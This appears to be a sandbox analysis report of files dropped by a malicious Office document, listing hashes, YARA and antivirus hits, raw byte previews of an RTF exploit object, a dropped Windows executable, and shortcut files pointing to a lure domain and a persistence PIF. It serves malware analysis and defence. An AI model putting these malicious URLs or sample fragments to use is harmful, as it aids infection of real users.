                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PNG image data, 1008 x 529, 8-bit/color RGBA, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):116917
                                                    Entropy (8bit):7.962967514652866
                                                    Encrypted:false
                                                    SSDEEP:3072:K34UL0tS6WB0JOqFVYGQcARI/McGdAT9kRLFdtSyj:k4UcLe0JOqPQZR8MDdATCR3tSw
                                                    MD5:460EFCF478D05AFB04311BA4833B41FB
                                                    SHA1:35A00E81ED5AA915810702E9BA42E0D6E9E24BA1
                                                    SHA-256:ABBF9B20F57F85EDAD5D5B5848335775428B47D1A48C0772A72D7A6C136D9C51
                                                    SHA-512:C5C6414B88579ADF217DE22C52C1CCB244EB532DED4B2533136D54D1D0F2EC474C36E2BC163FB9BCE05079AD06313B559C9746F73BC82FF42933EB1A3B94DD07
                                                    Malicious:false
                                                    Preview:.PNG........IHDR..............0V.....sRGB.........gAMA......a.....pHYs..........+......iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c137 1.000000, 0000/00/00-00:00:00 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:ns1="http://www.day.com/dam/1.0". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:dc="http://purl.org/dc/elements/1.1/". ns1:Physicalheightininches="-1.0". ns1:Physicalwidthininches="-1.0". ns1:Fileformat="PNG". ns1:Progressive="no". ns1:extracted="2018-06-11T14:21:13.228-07:00". ns1:Bitsperpixel="8". ns1:MIMEtype="image/png". ns1:Physicalwidthindpi="-1". ns1:Physicalheightindpi="-1". ns1:Numberofimages="1". ns1:Numberoftextualcomments="0". ns1:sha1="a5883b71b35060c98e8449851de4fae668c6ea9d". ns1:size="54990". tiff:ImageLength="727". tiff:ImageWidth="1020". dc:format="
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:ISO-8859 text, with very long lines (5166), with CRLF, CR, LF line terminators
                                                    Category:dropped
                                                    Size (bytes):37178
                                                    Entropy (8bit):3.5174036971121247
                                                    Encrypted:false
                                                    SSDEEP:384:VhZXB+50YucHlzQ5T/jlCOTbtbYtcQIukOOOjovKd4gqZjRiOMM2L42IVmJQzL+t:VhZg2Y/0T0Tc038lZZvmFn
                                                    MD5:E22EC5F92111A7CA5FC66630C27C7BB9
                                                    SHA1:E2D0AC4192C7C961F561678750299292DDCDDCA8
                                                    SHA-256:1761EC4983A70F982282C58697628F98C42E8F2197874BE62348445A53CCE51A
                                                    SHA-512:A292DC5C0BB8740481AD9CD22F51175E3A640115D440034633498FDE7345B29C12BD203AFED50B6889FEB427CC69A93E1A95070DA7B860F494231A12D85B1F3A
                                                    Malicious:true
                                                    Yara Hits:
                                                    • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\398EA60A.doc, Author: ditekSHen
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    Preview:{\rt..............{\*\fillDztype300836618 \.}.{\529557164.!3&,[9%-4?~`%0)@3!#.~~0:/?09/?1.0$,*???48%:|9;@@,_|<'%),'1+=.6%$7.@?.984;.0>|.%1^8]58~[&'6`2)?6#?=-2@<>;.[*6'8/:#52-:,%;=00[<)???#>-8'-?#!.<~8]%/?/.|@''%'0?'9_.$@60..5;[+6|)`%]!16)3(?7&_%$|'~^?(11.*/74??%2#8%/?~)5,/0?.52??;$>.]+'?^~6(?.$8)*9;?>_?.%37?[.5?3(8(/~:#2[6?&+%|?86!5(3?!8-*(5$%&-%[('%/?43-|6|/>?&??5:;'[+59&;9!>|@[(??8]]35?*??.`?.5+..!.<[%<3?~6@?89/=>(=?<+6??5~)5:*$@.~5<<:)#,1;?>($#>#4[45<~+[-:?6-<5.*??8-1%?6'=9?|!~1__7):/0'(?:(&'?]($/)7%5|+2.8(&/<,;.?*_($84#/*7%+?8.*)~$`3.#,.])-3/2_?<.?%>.?.4.=?%87?0[?51#_4.#^(39`@~?~~|@66=`@0%~#?)?-!7_#?$<3[%2|)<9&.<??'8;%]?1?[2,'[5;5(??@[2%?=5??@*5$(!.=?~!|3?~`.`!)?3#05..~62$?</+>.56;/<?,%;97('-8.:?@2(?,>22^?732`4./[7/(%66*_=)*(]0645-.6-,4`?.4.5_|9(2$1$??4(-|.#?9?.??:.0;:..49;|&?.6/./.?[,0#.-/24|.%<+,=%[#5?;!?-4='-%437(&$]9.9[1@?.:?8?6.9'+?<5.~+.?>),?(.:|79@8??[51?<*9?]-;;(@&4)2/^8.(]67('!9$$3:`.&2~'3<:*?.*$$._?=?-??./.|!*&1^#<49_>50?^.?_?5,_###;#^:~*21@.?=-3@!#_!:%<4=8~:|]=(!'-^./@.-
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                    Category:dropped
                                                    Size (bytes):631964
                                                    Entropy (8bit):1.8955511157617846
                                                    Encrypted:false
                                                    SSDEEP:1536:V55XsmuHoShA5q/ri+lGnSfKcfu50y7eMGn5v1IN6zJ8Tqbb0z88eqlYizq2:lMZu50yknG/qc+j6
                                                    MD5:402E85A1D79CB8CD52BE8098F3967D50
                                                    SHA1:35FB6B210AA34E65D315C7E2C49A3B5CD416F8F4
                                                    SHA-256:C1BAB1399C674CE9DCF811D19398EF01719F506E6B4BCC38AECF5B13A9B03070
                                                    SHA-512:3641C5DD22F198C7C192B90E4325F0ECFF53741FC7F3F18CEA9BCD15DE472B90228D3538A22C5F9C152F56D29FD7B056D345444487A26EB6B3591001C5C713D6
                                                    Malicious:false
                                                    Preview:....l................................5.. EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...............N........... ...O...!..............?...........?................................'................ `.....%...........(.................... `.L...d...............N...........~...
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                    Category:dropped
                                                    Size (bytes):979052
                                                    Entropy (8bit):3.348534840206666
                                                    Encrypted:false
                                                    SSDEEP:6144:8FOSyw4UcLe0JOqDQZR8MDdATCR3tSpjqcY:RUP/qDQZR8MxAm/SNnY
                                                    MD5:E1E8FD8A97AECB2DEA6BD5BBA97A6256
                                                    SHA1:8EA26370D07429A04F95BAF56DF38127DB452A3B
                                                    SHA-256:8F4CDC47129C005567662B5FAAD3E38267C4B109721ECA4130C037D5B3EA7084
                                                    SHA-512:14986C79D66FC9FE0552BA0992898118F2EA3DA5EF65409F7936655136EC7AE18EC4B6F63208B1B7A6D51C9784FA36953DA51BEC9391F9D85A7D9F606AF4028B
                                                    Malicious:false
                                                    Preview:....l...........................{....9.. EMF....l...............................@...........................F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................o..."...........!...................................................o..."...........!...................................................o..."...........!...................................................o..."...........!...................................................o...'.......................%...........................................................L...d...............>...............?...!..............?...........?................................'................ `.....%...........(.................... `.L...d...............>...............
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                    Category:dropped
                                                    Size (bytes):15872
                                                    Entropy (8bit):5.753002848532677
                                                    Encrypted:false
                                                    SSDEEP:384:cdPswx6w8PfwTwkPfw0w9Pfw0wBPfw0w:Tc6wcSwk5wZ5w15w
                                                    MD5:98E18DD95EB54D1627B02BE74E303FE4
                                                    SHA1:D20EC8D5276383AFC694FAA571609B0770AAF53B
                                                    SHA-256:6424A8A831313EF1642A2DB994F6EDEA6C42954A51098CBD99035466ABC9C44C
                                                    SHA-512:FF21D00623A8BF3559A54D16F5201D3C263AEB9328CF40EF5603E074C026623D59C9D2A6C95D2B5A186149EDF36748B8BC58151EB75F3B22BF57EE07D7ED98C5
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):11264
                                                    Entropy (8bit):3.6203495433609256
                                                    Encrypted:false
                                                    SSDEEP:192:DK/77uggkjluvMuB31A0pL+/6R/EIYrF7YWnORYaZjBnDPTCAQN:DKOVgQN1D5EIYrF8WuhtBnrqN
                                                    MD5:334E338FCF954C90610E6C3DB934CC35
                                                    SHA1:DEBCE122A7EDE20547E139AB1C4AF316587F23CC
                                                    SHA-256:2D99786978A94977416D0BF85CEE2C9B798667D733F1FF2811AC621A35A20D23
                                                    SHA-512:1880ED6C2137E4227D73F7ADA3C7F4F65AC36044FA557322746FA3B09F171745025C67ED0D8DC82B59868E27E23789E5941994A9AE77555305155C46D5589B29
                                                    Malicious:false
                                                    Preview:....................2.9.5.5.7.1.6.4...!.3.&.,.[.9.%.-.4.?.~.`.%.0.).@.3.!.#...~.~.0.:./.?.0.9./.?.1...0.$.,.*.?.?.?.4.8.%.:.|.9.;.@.@.,._.|.<.'.%.).,.'.1.+.=...6.%.$.7...@.?...9.8.4.;...0.>.|...%.1.^.8.].5.8.~.[.&.'.6.`.2.).?.6.#.?.=.-.2.@.<.>.;...[.*.6.'.8./.:.#.5.2.-.:.,.%.;.=.0.0.[.<.).?.?.?.#.>.-.8.'.-.?.#.!...<.~.8.].%./.?./...|.@.'.'.%.'.0.?.'.9._...$.@.6.0.....5.;.[.+.6.|.).`.%.].!.1.6.).3.(.?.7.&._.%.$.|.'.~.^.?.(.1.1...*./.7.4.?.?.%.2.#.8.%./.?.~.).5.,./.0.?...5.2.?.?.;.$.>...].+.'.?.^.~.6.(.?...$.8.).*.9.;.?.>._.?...%.3.7.?.[...5.?.3.(.8.(./.~.:.#.2.[.6.?.&.+.%.|.?.8.6.!.5.(.3.?.!.8.-.*.(.5.$.%.&.-.%.[.(.'.%./.?.4.3.-.|.6.|./.>.?.&.?.?.5.:.;.'.[.+.5.9.&.;.9.!.>.|.@.[.(.?.?.8.].].3.5.?.*.?.?...`.?...5.+.....!...<.[.%.<.3.?.~.6.@.?.8.9./.=.>.(.=.?.<.+.6.?.?.5.~.).5.:.*.$.@...~.5.<.<.:.).#.,.1.;.?.>.(.$.#.>.#.4.[.4.5.<.~.+.[.-.:.?.6.-.<.5...*.?.?.8.-.1.%.?.6.'.=.9.?.|.!.~.1._._.7.).:./.0.'.(.?.:.(.&.'.?.].(.$./.).7.%.5.|.+.2...8.(.&./.<.,.;...?.*._.(.$.8.4.#./.*.7.%.+.?.8...*.).
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):1024
                                                    Entropy (8bit):0.05390218305374581
                                                    Encrypted:false
                                                    SSDEEP:3:ol3lYdn:4Wn
                                                    MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                    SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                    SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                    SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                    Malicious:false
                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):131072
                                                    Entropy (8bit):0.02568179153757395
                                                    Encrypted:false
                                                    SSDEEP:6:I3DPcHnCvxggLRbQ4UrZzFRXv//4tfnRujlw//+GtluJ/eRuj:I3DPT3Q4yZfvYg3J/
                                                    MD5:1CA4F988D7E4EF4BADE6AF3F29DCFCDC
                                                    SHA1:8585098DF832531CF158AEAAAEF3977304D021A6
                                                    SHA-256:ED9BDFD3E586DB7D368C8EB197A370468FB5925C495ACFD74EDD17C6562F2E74
                                                    SHA-512:F5BD06AE0142152CA9FE111D7A36D947C4AAC12D2E246ECA611ADF038178814A36C998864DE4419CBAA4FD3F79C9C04E991ED39996014C55295BAEE61FB80379
                                                    Malicious:false
                                                    Preview:......M.eFy...z..v.O..E..;....MS,...X.F...Fa.q.............................*..7..I.0) ".............;...A..t..:.......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):131072
                                                    Entropy (8bit):0.025596195216858054
                                                    Encrypted:false
                                                    SSDEEP:6:I3DPcQpozOS1HvxggLRDwNs6XlJRRXv//4tfnRujlw//+GtluJ/eRuj:I3DPt/SRvw+6DvYg3J/
                                                    MD5:D1D87E2710CC3F41315F1BC7B54A7B96
                                                    SHA1:2227E90B5E18287ACE4E09C924C32585B237CB5E
                                                    SHA-256:29A25C6C44F5CCF8A292B9EE2861851F08F467CA5F131726CB65149FC1E649BB
                                                    SHA-512:13AC5212A36F96B8FB4A7C5D8B05FED2B9F678FA6E14E2C5D0356BC1F7910469A16A4A15E0A5CDD201CB70CB0B67D5A2CF029A71EE8DE3AE1ABDF48AF4393073
                                                    Malicious:false
                                                    Preview:......M.eFy...z..*..5.M...4N.t.S,...X.F...Fa.q............................T...].I..Wx:.5.........gY.....@.....@.......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):512
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3::
                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                    Malicious:false
                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):159744
                                                    Entropy (8bit):7.405677094999999
                                                    Encrypted:false
                                                    SSDEEP:3072:u4DA2v34UL0tS6WB0JOqFVYGQcARI/McGdAT9kRLFdtSyFq:u4DA2v4UcLe0JOqPQZR8MDdATCR3tS5
                                                    MD5:F6CAB1AC73314002CB06D2FC2311B8AB
                                                    SHA1:16CD5181E995605CC1061B7E4986A5C6378BCF70
                                                    SHA-256:6DEB26DDE281E8E41A0140B5A4445DFCBCD94FD79939D438EA88B220CC5729CC
                                                    SHA-512:4D155279BA2B4AEA18E1D5C0B00BE0BB1043894A18AB5FC3834817550914E298621E9050AD01DFAD0064272CCD470E5B0F4F425AA0A647A842B9FE1F7D5073E2
                                                    Malicious:false
                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                    Category:dropped
                                                    Size (bytes):142336
                                                    Entropy (8bit):7.890080062147666
                                                    Encrypted:false
                                                    SSDEEP:3072:I4DA2v34UL0tS6WB0JOqFVYGQcARI/McGdAT9kRLFdtSyF:I4DA2v4UcLe0JOqPQZR8MDdATCR3tS
                                                    MD5:5FA2F9CE5CE6AEC6DDA6859FF8A8DAFE
                                                    SHA1:B2F56E0F5BEA772E3CD5768F9C4F2881564DE505
                                                    SHA-256:4E52755442743ADE0EE9A5969FCF7566FEE0C6508E743D0852E570BD26F0B47C
                                                    SHA-512:EEA7CA3317A9B280B8B5650A2F8A88E5E3E97DF6784A47474E3C3A999E457F506E1A4D27F4E7ADEB191411FA80625AE73910EAE3CF60BDC4FE65E96A1488D5D0
                                                    Malicious:false
                                                    Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):512
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3::
                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                    Malicious:false
                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:MS Windows 95 Internet shortcut text (URL=<http://qr-in.com/NAvSGzZ>), ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):50
                                                    Entropy (8bit):4.768367439558377
                                                    Encrypted:false
                                                    SSDEEP:3:HRAbABGQYm/yYMLaZy:HRYFVm/vo
                                                    MD5:B3EB7746BC094053F5005B355A2EC080
                                                    SHA1:065DF25D416F8E51756BB6290812A04D77BEF585
                                                    SHA-256:E95B8407F424AAA4CE4C79D4FD66BBA23D6B2E0AFA5E7C5273E72DFE01915298
                                                    SHA-512:CAAFDC4134949D15CBF6BC0B15BFA6659F9D4575B4E9AB4146D444E72831057378696916699578A75B4E2177EADBDD5F59885BC3278DB4E5ED5A91E57743B39A
                                                    Malicious:true
                                                    Preview:[InternetShortcut]..URL=http://qr-in.com/NAvSGzZ..
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:Generic INItialization configuration [xls]
                                                    Category:modified
                                                    Size (bytes):152
                                                    Entropy (8bit):4.980455622523978
                                                    Encrypted:false
                                                    SSDEEP:3:bDQSKRS1IAAmQRfjipve0EMmUmMt7mQRfjipve0EMmUv:b/KRS19AnjUve0lht7njUve0ll
                                                    MD5:20D5DDC41AB60339D96D9A82DEF62E31
                                                    SHA1:39D3CE49C6C7D995D91CBDF61AFB393136C2D74F
                                                    SHA-256:0ECBA6E6094104A4166AEAA5CFA4B505669B5583272B3675E1C65310C25F7D7E
                                                    SHA-512:ED5F11FD726AF2795C9EA45D0EDF63A1C4F85CA364A03F8B769FFDA1CE0B30CA7DD9372168B46BB4EF1CED782177B2D75C7F457A33F82595BB0596673D1C2B72
                                                    Malicious:false
                                                    Preview:[folders]..NAvSGzZ.url=0..qr-in.com.url=0..Home Purchase Contract and Property Details.LNK=0..[xls]..Home Purchase Contract and Property Details.LNK=0..
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:MS Windows 95 Internet shortcut text (URL=<http://qr-in.com/>), ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):43
                                                    Entropy (8bit):4.454766207938903
                                                    Encrypted:false
                                                    SSDEEP:3:HRAbABGQYm/yYMLavn:HRYFVm/Zvn
                                                    MD5:BCE27C32D9E5CC59720E561F056B8C16
                                                    SHA1:9D49F75E362B1CD11BEDD75632A0ACFFB4B1F1F5
                                                    SHA-256:4166C0FFD11057DC2E21EE3BE8D7C77EF00D0F9CC12F005AE2DB7C9C3DF7076B
                                                    SHA-512:9720C341D103034D605C4C3BC121D18E0ADE4051702C2ACA9ABAE6A1468A65AB129D126BE9B042AE7C3F2CCEF99B8A66E26C6ED41B695BF98F6B0B02CBEA3892
                                                    Malicious:true
                                                    Preview:[InternetShortcut]..URL=http://qr-in.com/..
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):162
                                                    Entropy (8bit):2.4797606462020303
                                                    Encrypted:false
                                                    SSDEEP:3:vrJlaCkWtVyWzUbGabuW0iWVlfln:vdsCkWtqb9bt2dl
                                                    MD5:B33B8593034E436C71DA5820F309CDF3
                                                    SHA1:61021B359E9ECBEBA3A941C907F03C4C7002F58E
                                                    SHA-256:82732B2A3E81F7CBE7A72A4DDA5679175EB54FF45A331B743F768739E4E45975
                                                    SHA-512:2CA8AB8261B68676E34E0B1D7BCD14064B7EFE9AB28C6071FEBB13B056D547782F5DECE788115AFFF9EC35A85B8BF6957DA725E82D0E276419FA64AF9FC79D85
                                                    Malicious:false
                                                    Preview:.user..................................................A.l.b.u.s.............p........1@..............2@.............@3@..............3@.....z.......p4@.....x...
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):70
                                                    Entropy (8bit):4.093789131356648
                                                    Encrypted:false
                                                    SSDEEP:3:X6RWAWNdcSNvT6h8yTTQFX:qRdyeUGyX
                                                    MD5:82E76F73B4279F0420326B9AEB35CC2C
                                                    SHA1:C8D42AA3ECE0A959A32213D2C4409671516DB68D
                                                    SHA-256:F3B86932EDD3854BE843901ABE76B12F98A03368B716368687E6DDADA2E51DF8
                                                    SHA-512:A152A02B2E9ACC78E44268001E72C4C26614D8E2732C593DB64D80CA418A8A6916D354D0DFA0260F188C017CFA2ABA6AADA6851418FB50B1B10D1657D3EC79D4
                                                    Malicious:false
                                                    Preview:short_4348.1.qr-in.com/.9728.169636864.31108416.4056684366.31108413.*.
                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):1388544
                                                    Entropy (8bit):5.5299258127514435
                                                    Encrypted:false
                                                    SSDEEP:24576:AP+g7Wy3xfMZKdcKtTjbJ4HEEEEEEEEEEEEEEEEEEEETKKKKKKKKKKKKKKKKKKK7:A/iy3g6TjbsEEEEEEEEEEEEEEEEEEEE+
                                                    MD5:913C99449A29C2640D36B0D5FDF69289
                                                    SHA1:858971F52AB45DC8BE5F2C43DA9B0C25BA398435
                                                    SHA-256:39475882127FD9789D9C23444153A4A4841F3FFBB34FFABB0C540E6E9D76D034
                                                    SHA-512:B35A9A28D01A948455DA4D078D9F9D1AACB5E9FFF5C8359B4278400E29296C75FF96554AE6CC8CD4F53D1DB8525D43927C87B793E3FB2E72549D944FD62A6D96
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 21%
                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................X......(.............@..............................................@...........................@..@%...............................k...................................................F...............................text............................... ..`.itext..p<.......>.................. ..`.data...P...........................@....bss.....6...............................idata..@%...@...&..................@....tls....4....p...........................rdata..............................@..@.reloc...k.......l..................@..B.rsrc................t..............@..@.....................0..............@..@................................................................................................
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu May 23 19:21:27 2024, Security: 1
                                                    Category:dropped
                                                    Size (bytes):357376
                                                    Entropy (8bit):7.9574463262525565
                                                    Encrypted:false
                                                    SSDEEP:6144:c4DA2v4UcLe0JOqPQZR8MDdATCR3tSelY5vsLx3HRoTvrnfJRnPh12TBpShVug:c4NwUP/qPQZR8MxAm/SeCsN3xirPPKH
                                                    MD5:42E9B6532A4FCF588D5B003158586155
                                                    SHA1:3A73E403D6FE67D4249DE2B82917D8551E1CFD4A
                                                    SHA-256:A503730E0EC1D5B495A5D9DFEDECC69A23F3A25AF02078DADE9D13A0819404CB
                                                    SHA-512:393E66CC015F85AE73A6D12A6B25EF953943B915EA1D563668C4DF4D6BD4179E182B57005914B2B05F15A601091DF54EDE353A8917B4833A8ABA0B0DFE96355E
                                                    Malicious:false
                                                    Preview:......................>...............................................................u.......w........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):26
                                                    Entropy (8bit):3.95006375643621
                                                    Encrypted:false
                                                    SSDEEP:3:ggPYV:rPYV
                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                    Malicious:false
                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu May 23 19:21:27 2024, Security: 1
                                                    Category:dropped
                                                    Size (bytes):357376
                                                    Entropy (8bit):7.9574463262525565
                                                    Encrypted:false
                                                    SSDEEP:6144:c4DA2v4UcLe0JOqPQZR8MDdATCR3tSelY5vsLx3HRoTvrnfJRnPh12TBpShVug:c4NwUP/qPQZR8MxAm/SeCsN3xirPPKH
                                                    MD5:42E9B6532A4FCF588D5B003158586155
                                                    SHA1:3A73E403D6FE67D4249DE2B82917D8551E1CFD4A
                                                    SHA-256:A503730E0EC1D5B495A5D9DFEDECC69A23F3A25AF02078DADE9D13A0819404CB
                                                    SHA-512:393E66CC015F85AE73A6D12A6B25EF953943B915EA1D563668C4DF4D6BD4179E182B57005914B2B05F15A601091DF54EDE353A8917B4833A8ABA0B0DFE96355E
                                                    Malicious:false
                                                    Preview:......................>...............................................................u.......w........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                    Process:C:\Users\user\AppData\Roaming\csrss.exe
                                                    File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Efftwcmk.PIF">), ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):100
                                                    Entropy (8bit):5.085951690356517
                                                    Encrypted:false
                                                    SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMgR1m7ovsb73cPk:HRYFVmTWDyzVR1m7yE74k
                                                    MD5:3662EA53670602AFB4A434630AC412C2
                                                    SHA1:B2E05C9F902EE48758AB9BF84949F87B126D43CA
                                                    SHA-256:F70BE95C0F9440786C3D39632FC5972D36416ED2ABA3C7609F05E1715DE2AD10
                                                    SHA-512:CB5816819FEFE1345B1C6557A3F8B08F61DA561A8D43DFDF74B7174B4D769860D68BF92F9CB5C9A85CCDB73A88B870440CF719C9F3B67D19E1BB53581948876C
                                                    Malicious:true
                                                    Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Efftwcmk.PIF"..IconIndex=33..HotKey=57..
                                                    Process:C:\Users\user\AppData\Roaming\csrss.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):838431
                                                    Entropy (8bit):7.204072438029786
                                                    Encrypted:false
                                                    SSDEEP:12288:KmFqq8TrOYDZ0RL/5HIpZKwDcu+ALjUwHxNnrpEGOFz9cWVAfGWYHW8:K1q83OYDSRbapwwj+6jTIFBe+Z
